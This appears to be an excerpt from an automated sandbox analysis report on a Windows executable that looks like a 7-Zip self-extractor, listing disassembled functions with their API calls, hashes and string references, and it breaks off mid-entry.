Part of subcall function 00408DBF: lstrcpyW.KERNEL32(00000000,?), ref: 00408E76
Part of subcall function 00408DBF: lstrcpyW.KERNEL32(-00000002,?), ref: 00408E87
Part of subcall function 00408DBF: ??3@YAXPAX@Z.MSVCRT(00000000,00000000), ref: 00408E90
Part of subcall function 00408DBF: LocalFree.KERNEL32(?), ref: 00408E9A

Memory Dump Source

Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd

Similarity

API ID: FormatMessagelstrcpylstrlen$??2@??3@CreateErrorFreeLastLocalObjectSingleThreadWaitwvsprintf
String ID:
API String ID: 359084233-0
Opcode ID: 66257497e4407e65e3ec51839b2cc1af24185b4b9cde7a4118d25a0965ef4d55
Instruction ID: 99d6c8c0394ba6fc9b9d299436d7c7a44fadaa3de81f278bf7a0439fefe7fe09
Opcode Fuzzy Hash: 66257497e4407e65e3ec51839b2cc1af24185b4b9cde7a4118d25a0965ef4d55
Instruction Fuzzy Hash: 0D31E131600200FBCA355B54DC95EEB36A8EB81754B28853BF515F62F0DA7A8C829A1E

Function 00404545 Relevance: 6.1, APIs: 4, Instructions: 66
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTempPathW.KERNEL32(00000001,00000000,00000002,00000000,00406D05,00000000,?,?,00405368,?,7ZSfx%03x.cmd), ref: 00404568
GetTempPathW.KERNEL32(00000001,00000000,00000001,?,?,00405368,?,7ZSfx%03x.cmd), ref: 00404585
wsprintfW.USER32 ref: 004045BB
GetFileAttributesW.KERNELBASE(?), ref: 004045D6

Memory Dump Source

Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd

Similarity

API ID: PathTemp$AttributesFilewsprintf
String ID:
API String ID: 1746483863-0
Opcode ID: 0e4a8cbd59d5c8a173ea11c71d2339e4dceea1800af4b6b4e6d7220fd0c99624
Instruction ID: 733027a3fcd96ec5c8df4ae3473da8ef02d46a04784f0fe1f39aec502691af17
Opcode Fuzzy Hash: 0e4a8cbd59d5c8a173ea11c71d2339e4dceea1800af4b6b4e6d7220fd0c99624
Instruction Fuzzy Hash: C1112772500604FFC701AF55CC84AADB7B8FF84314F10802EF946972E1CB799900CB94

Function 0040CD11 Relevance: 6.1, APIs: 4, Instructions: 58
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_CxxThrowException.MSVCRT(00100EC3,00417010), ref: 0040CD3C
??2@YAPAXI@Z.MSVCRT(00000004,004193AC,004193AC,00000000,?,0040CE09,00000064,004107AA,004193AC,004032FF,00000000,00000000,004049F2,?,?,?), ref: 0040CD64
memcpy.MSVCRT(00000000,0097A1A0,00000004,004193AC,004193AC,00000000,?,0040CE09,00000064,004107AA,004193AC,004032FF,00000000,00000000,004049F2,?), ref: 0040CD8D
??3@YAXPAX@Z.MSVCRT(0097A1A0,004193AC,004193AC,00000000,?,0040CE09,00000064,004107AA,004193AC,004032FF,00000000,00000000,004049F2,?,?,?), ref: 0040CD98

Memory Dump Source

Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd

Similarity

API ID: ??2@??3@ExceptionThrowmemcpy
String ID:
API String ID: 3462485524-0
Opcode ID: d9fd66f9b7e867562732bb3ec7a1e67f9ffff38b6fdda3ab2a622335468b0fbd
Instruction ID: d1fdfccabdcefd16927407a1053df183a81c89610647dbf5fb7e55cd38556c17
Opcode Fuzzy Hash: d9fd66f9b7e867562732bb3ec7a1e67f9ffff38b6fdda3ab2a622335468b0fbd
Instruction Fuzzy Hash: 2F11E572200300EBCB289F16D9C0D5BFFE9AF843547108A3FE559A7390D779E98547A8

Function 00411C05 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 243COMMON

Download Yara Rule

APIs

Part of subcall function 0041156F: ??2@YAPAXI@Z.MSVCRT(0000000C,000000FF,00411D35,00416DD8,00000001,?,?,00000000), ref: 00411574

??3@YAXPAX@Z.MSVCRT(00000000,00416DD8,00000001,?,?,00000000), ref: 00411D36

Part of subcall function 0040E036: ??2@YAPAXI@Z.MSVCRT(?,?,?,?,00410D1B,00010000), ref: 0040E049
Part of subcall function 0040E036: memmove.MSVCRT(00000000,?,?,?,?,?,00410D1B,00010000), ref: 0040E063
Part of subcall function 0040E036: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00410D1B,00010000), ref: 0040E073

??2@YAPAXI@Z.MSVCRT(00000014,00000000,00416DD8,00000001,?,?,00000000), ref: 00411D6E

Strings

{D@, xrefs: 00411C15, 00411C44, 00411C56

Memory Dump Source

Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd

Similarity

API ID: ??2@$??3@$memmove
String ID: {D@
API String ID: 4294387087-1160549682
Opcode ID: 1b9917daedaf4263f7aa560e5a2ae6e65f798d735d95e35bc04e9499dbe68006
Instruction ID: 87b977b41272fa9bbbce8bbb083323c071bac7afc4455a16ffe75f8a4777ec8d
Opcode Fuzzy Hash: 1b9917daedaf4263f7aa560e5a2ae6e65f798d735d95e35bc04e9499dbe68006
Instruction Fuzzy Hash: 77B1C471900249DFCB14EFAAD8919DDBBB5FF08304F60412EF919A7261DB38A985CF94

Function 00412525 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 200COMMON

Download Yara Rule

APIs

Part of subcall function 004105E9: _CxxThrowException.MSVCRT(?,00417298), ref: 00410603

??3@YAXPAX@Z.MSVCRT(?,?,?,?,(nA,?,00416DD8), ref: 00412643
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,(nA,?,00416DD8), ref: 0041279B

Strings

(nA, xrefs: 004126DD, 004126E0

Memory Dump Source

Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd

Similarity

API ID: ??3@$ExceptionThrow
String ID: (nA
API String ID: 2803161813-867891557
Opcode ID: 482bcfdae203e7c5ef080e28929bbf56565bdd51ccce1818c05e782574a96224
Instruction ID: 0ece9700425cb4d864afba528f8150fdb1f56e7dd499115c8cef0e07f043e1c2
Opcode Fuzzy Hash: 482bcfdae203e7c5ef080e28929bbf56565bdd51ccce1818c05e782574a96224
Instruction Fuzzy Hash: A9814B70A00605AFCB24DFA5C591AEEFBF6BF08314F14452EE515E3391D7B8AA90CB58

Function 0040CBAC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 0040CBC4
_CxxThrowException.MSVCRT(?,00416FBC), ref: 0040CBE7

Strings

PlA, xrefs: 0040CBD6

Memory Dump Source

Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd

Similarity

API ID: AllocExceptionStringThrow
String ID: PlA
API String ID: 3773818493-1533977103
Opcode ID: 9da6470fb493ce6a5e6bdcff394512404a5483abbe6bbc59635324e60b80df40
Instruction ID: 296fbbf4859103af06767512d87f49f38bd905f8065bfdcdd98956010b0ea552
Opcode Fuzzy Hash: 9da6470fb493ce6a5e6bdcff394512404a5483abbe6bbc59635324e60b80df40
Instruction Fuzzy Hash: 54E0ED71600304EADB209F65E8829D6BBF8EF04785710C53FF948DA250E7B9E980C79C

Function 00403C93 Relevance: 4.7, APIs: 3, Instructions: 151COMMON

Download Yara Rule

APIs

Part of subcall function 0040236F: LoadLibraryA.KERNEL32(kernel32,GetNativeSystemInfo,?,?,?,?,?,004023A5,00405BA0,00419858,00419858), ref: 0040237F
Part of subcall function 0040236F: GetProcAddress.KERNEL32(00000000), ref: 00402386
Part of subcall function 0040236F: GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,004023A5,00405BA0,00419858,00419858), ref: 00402394

??3@YAXPAX@Z.MSVCRT(00405C1F,?,?,?,?,?,?,?,00405C1F), ref: 00403E21
??3@YAXPAX@Z.MSVCRT(?,00405C1F,?,?,?,?,?,?,?,00405C1F), ref: 00403E29
??3@YAXPAX@Z.MSVCRT(?,?,00405C1F,?,?,?,?,?,?,?,00405C1F), ref: 00403E31

Memory Dump Source

Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd

Similarity

API ID: ??3@$AddressInfoLibraryLoadNativeProcSystem
String ID:
API String ID: 1642057587-0
Opcode ID: 2edeb6870186df4899fc93cecf3c13409a52d81f25f5698bf367cb70c9bc3b0e
Instruction ID: 921b34b2ca4cae370864143a871e5ac41304b7093d26a65462705394026d5d48
Opcode Fuzzy Hash: 2edeb6870186df4899fc93cecf3c13409a52d81f25f5698bf367cb70c9bc3b0e
Instruction Fuzzy Hash: A8515FB2D04109AADF01EFD1CD919FEBB7DAF04309F04406AF511B62C1D7799A4ADB98

Function 0040172C Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 103COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(000001E8,00000000,00419810,ExecuteFile,0000002D,0000002D,?,00406616,?,00419810,00419810), ref: 00401739
??2@YAPAXI@Z.MSVCRT(00000040), ref: 004017D6

Part of subcall function 004036F1: lstrlenW.KERNEL32(004017CF,00000000,?,?,?,?,?,?,004017CF,?), ref: 004036FE
Part of subcall function 004036F1: GetSystemTimeAsFileTime.KERNEL32(?,004017CF,?,?,?,?,004017CF,?), ref: 00403774
Part of subcall function 004036F1: GetFileAttributesW.KERNELBASE(?,?,?,?,?,004017CF,?), ref: 0040377B
Part of subcall function 004036F1: ??3@YAXPAX@Z.MSVCRT(?,004017CF,?,?,?,?,004017CF,?), ref: 0040383A

Strings

ExecuteFile, xrefs: 00401731

Memory Dump Source

Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd

Similarity

API ID: ??2@FileTime$??3@AttributesSystemlstrlen
String ID: ExecuteFile
API String ID: 1306139538-323923146
Opcode ID: 03c1fc4a848cb1bd6dc51e2723fab2d4ca0176e216816c9125f0e1fc3d427f7b
Instruction ID: 9484230cc67166f2f755b6e2650531b124a09860f62e081dc195098c01fa7d0a
Opcode Fuzzy Hash: 03c1fc4a848cb1bd6dc51e2723fab2d4ca0176e216816c9125f0e1fc3d427f7b
Instruction Fuzzy Hash: 6531E375700204BBCB20ABA5CC89CAFB7B9EFC4705728086FF405E73A1DB799D408628

Function 0040E036 Relevance: 4.5, APIs: 3, Instructions: 35COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(?,?,?,?,00410D1B,00010000), ref: 0040E049
memmove.MSVCRT(00000000,?,?,?,?,?,00410D1B,00010000), ref: 0040E063
??3@YAXPAX@Z.MSVCRT(?,?,?,?,00410D1B,00010000), ref: 0040E073

Memory Dump Source

Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd

Similarity

API ID: ??2@??3@memmove
String ID:
API String ID: 3828600508-0
Opcode ID: 14f79194ee43146d53f25d620fb32e5909a7870d385986c1847f37be60183fce
Instruction ID: 4d808faca08bf89b0fd6c24434e0160128b2010f8b4ad61872e4f6e811daac21
Opcode Fuzzy Hash: 14f79194ee43146d53f25d620fb32e5909a7870d385986c1847f37be60183fce
Instruction Fuzzy Hash: 28F08232600720AFD2305F27DD8095BB7A9EBC47153148D3FE5AD92350CAB5E8518659

Function 004116C3 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 175COMMON

Download Yara Rule

APIs

Part of subcall function 0040CD11: _CxxThrowException.MSVCRT(00100EC3,00417010), ref: 0040CD3C
Part of subcall function 0040CD11: ??2@YAPAXI@Z.MSVCRT(00000004,004193AC,004193AC,00000000,?,0040CE09,00000064,004107AA,004193AC,004032FF,00000000,00000000,004049F2,?,?,?), ref: 0040CD64
Part of subcall function 0040CD11: memcpy.MSVCRT(00000000,0097A1A0,00000004,004193AC,004193AC,00000000,?,0040CE09,00000064,004107AA,004193AC,004032FF,00000000,00000000,004049F2,?), ref: 0040CD8D
Part of subcall function 0040CD11: ??3@YAXPAX@Z.MSVCRT(0097A1A0,004193AC,004193AC,00000000,?,0040CE09,00000064,004107AA,004193AC,004032FF,00000000,00000000,004049F2,?,?,?), ref: 0040CD98

??3@YAXPAX@Z.MSVCRT(00000000,?,?), ref: 004117AE

Strings

, xrefs: 0041184E

Memory Dump Source

Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd

Similarity

API ID: ??3@$??2@ExceptionThrowmemcpy
String ID:
API String ID: 4187306206-3916222277
Opcode ID: f9194f882b2ea3db6a0ab7bd140c601fd3bb563b5c08037d8f1c8d7fcc156054
Instruction ID: 7b6fd5b2a41faf5e2d4800b3bc48d7f7b0be7b8839dec2c588299b9df1e5f3d5
Opcode Fuzzy Hash: f9194f882b2ea3db6a0ab7bd140c601fd3bb563b5c08037d8f1c8d7fcc156054
Instruction Fuzzy Hash: 8E613C70D00219EBCF15EFA6C5815EEBBB5BF44314B10852FE915A7391C738AAC1CBA8

Function 004026CF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNELBASE(00000040), ref: 004026F3

Strings

@, xrefs: 004026E6

Memory Dump Source

Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID: @
API String ID: 1890195054-2766056989
Opcode ID: 2755d2f4d32b7a33f337b75ab828a694b6e8efe9be06c7f4c0d7d4513a976335
Instruction ID: 06539b43d6f5c2ce11291560a72fbbc8528a2f3b0367cc898c628306ed72bb09
Opcode Fuzzy Hash: 2755d2f4d32b7a33f337b75ab828a694b6e8efe9be06c7f4c0d7d4513a976335
Instruction Fuzzy Hash: 20F0C2309102089ACF19AF70DA9DBAF3BA4BF00348F104A3AD462F72D0D7F8D845864C

Function 0040C7E0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT ref: 0040C828

Strings

lA, xrefs: 0040C7F2

Memory Dump Source

Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd

Similarity

API ID: ??3@
String ID: lA
API String ID: 613200358-262130271
Opcode ID: 42a9dad65033d51cf8f59d802589b5647fb0ca4d13111c145937023645a98698
Instruction ID: be810f4beaf6972e7a5014057c92b7027d0de42a9649241163ddb4af855fb9b0
Opcode Fuzzy Hash: 42a9dad65033d51cf8f59d802589b5647fb0ca4d13111c145937023645a98698
Instruction Fuzzy Hash: 73F01CB26007119BC320EF58D845B87B7E8AF44304B148A3FE48997651E7B8E985CBED

Function 0041017A Relevance: 3.1, APIs: 2, Instructions: 135COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0041017F
??3@YAXPAX@Z.MSVCRT(?), ref: 00410274

Memory Dump Source

Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd

Similarity

API ID: ??3@H_prolog
String ID:
API String ID: 1329742358-0
Opcode ID: 5cfeb028780a622b7539a61e3fe604e8286099a3359bcd0eb634551b058b4ad4
Instruction ID: 10f57f22a906aa0b0a42583f003833c21146b94334aab583da89fc310c08d6c6
Opcode Fuzzy Hash: 5cfeb028780a622b7539a61e3fe604e8286099a3359bcd0eb634551b058b4ad4
Instruction Fuzzy Hash: A5410232804014ABCB15DBA4C989AFE7B34EF06304B1440ABF401776A2DABD5EC9975D

Function 00401172 Relevance: 3.0, APIs: 2, Instructions: 42COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,0040146C,00000003,?,004057B0,?,00000000), ref: 00401192
??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,0040146C,00000003,?,004057B0,?,00000000), ref: 004011B8

Memory Dump Source

Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd

Similarity

API ID: ??2@??3@
String ID:
API String ID: 1936579350-0
Opcode ID: 3de9a2dd7c2c7b4c068155455a4e34c44bba3e714840795dfa7464e03e76c69f
Instruction ID: d4d9177561ba86130c59ecf769237b2e762d53917a12275e761ebd000d06797d
Opcode Fuzzy Hash: 3de9a2dd7c2c7b4c068155455a4e34c44bba3e714840795dfa7464e03e76c69f
Instruction Fuzzy Hash: 7AF08C36610611ABD338DF29C58186BB3E4EB88355720893FE28ACB2A1DA35A880C754

Function 0040250F Relevance: 3.0, APIs: 2, Instructions: 34COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(?,00000000,?,00000024,00402850,00000001,00000020,00402E23,00000000,00000000,00000000,00000020), ref: 0040251F
??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000024,00402850,00000001,00000020,00402E23,00000000,00000000,00000000,00000020), ref: 00402543

Memory Dump Source

Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd

Similarity

API ID: ??2@??3@
String ID:
API String ID: 1936579350-0
Opcode ID: ba9d36209897f222e9b0badb1651508dca26fbd5a7a7d6a1c9b297b28edd6115
Instruction ID: ee6e1bd81e6d65453633442f6a1d57c69857676589945f0ce02378b43b8f31e2
Opcode Fuzzy Hash: ba9d36209897f222e9b0badb1651508dca26fbd5a7a7d6a1c9b297b28edd6115
Instruction Fuzzy Hash: 0DF09035004652AFC3309F29D994843F7E4AF55705720887FE1DAC33A2C674A880C768

Function 004045F4 Relevance: 3.0, APIs: 2, Instructions: 31COMMON

Download Yara Rule

APIs

SetEnvironmentVariableW.KERNELBASE(?,?,?,00000000,?,?,00406260,?,00000000,0000000A), ref: 00404630
??3@YAXPAX@Z.MSVCRT(?,?,?,00406260,?,00000000,0000000A), ref: 00404639

Memory Dump Source

Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd

Similarity

API ID: ??3@EnvironmentVariable
String ID:
API String ID: 3880889418-0
Opcode ID: eb7f12ebf992c4d216b1ba86c510b8309f717ca77dcd3ea1f37af4bb5a52afa9
Instruction ID: b821aa63e9602637d8feb686bb827f934507ba03fca214f0c99b91fc16a187d9
Opcode Fuzzy Hash: eb7f12ebf992c4d216b1ba86c510b8309f717ca77dcd3ea1f37af4bb5a52afa9
Instruction Fuzzy Hash: BDF05836900118AFCB01AF98EC458CE77B8EB48704B41807AE922A72A1DB34AD418B8D

Function 0040C8F9 Relevance: 3.0, APIs: 2, Instructions: 30COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(?,?,?,?), ref: 0040C914
GetLastError.KERNEL32(?,?,?,?), ref: 0040C922

Memory Dump Source

Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 8b88ea7865465276bf5a21a54c36bc0df87277094e8d6374ce9343fa71539519
Instruction ID: 5a685d8d3943d7b2e7289d0006b4b3d46cacc15a83080b067a3dad9829954c10
Opcode Fuzzy Hash: 8b88ea7865465276bf5a21a54c36bc0df87277094e8d6374ce9343fa71539519
Instruction Fuzzy Hash: F7F0DAB5900208FFCB04CF94D9849EE7BB5EF49310B108669F915A73A0D7359E50DB64

Function 0040DA22 Relevance: 2.5, APIs: 2, Instructions: 34COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 0040DA2D
LeaveCriticalSection.KERNEL32(?,?,?,?,?), ref: 0040DA4C

Memory Dump Source

Source File: 00000000.00000002.3976606139.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3976554412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976666977.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976714195.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3976757995.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_mSRW5AfJpC.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 9f865e1c4fc0fe21fbcef52b0fef9e7314b0768b57200dd69fc44cf09c27d63e
Instruction ID: 5d27eff888a04a2a1af920e5c8fe564bbb0a5ef9a93153a65d570a8b15afed72
Opcode Fuzzy Hash: 9f865e1c4fc0fe21fbcef52b0fef9e7314b0768b57200dd69fc44cf09c27d63e
Instruction Fuzzy Hash: ADF01D36600214EBCB119FD5DC08E9ABBA9FF99761F10442AFA41A7260C771E811DFA4

Function 00410329 Relevance: 1.6, APIs: 1, Instructions: 74COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0041032E

Memory Dump Source

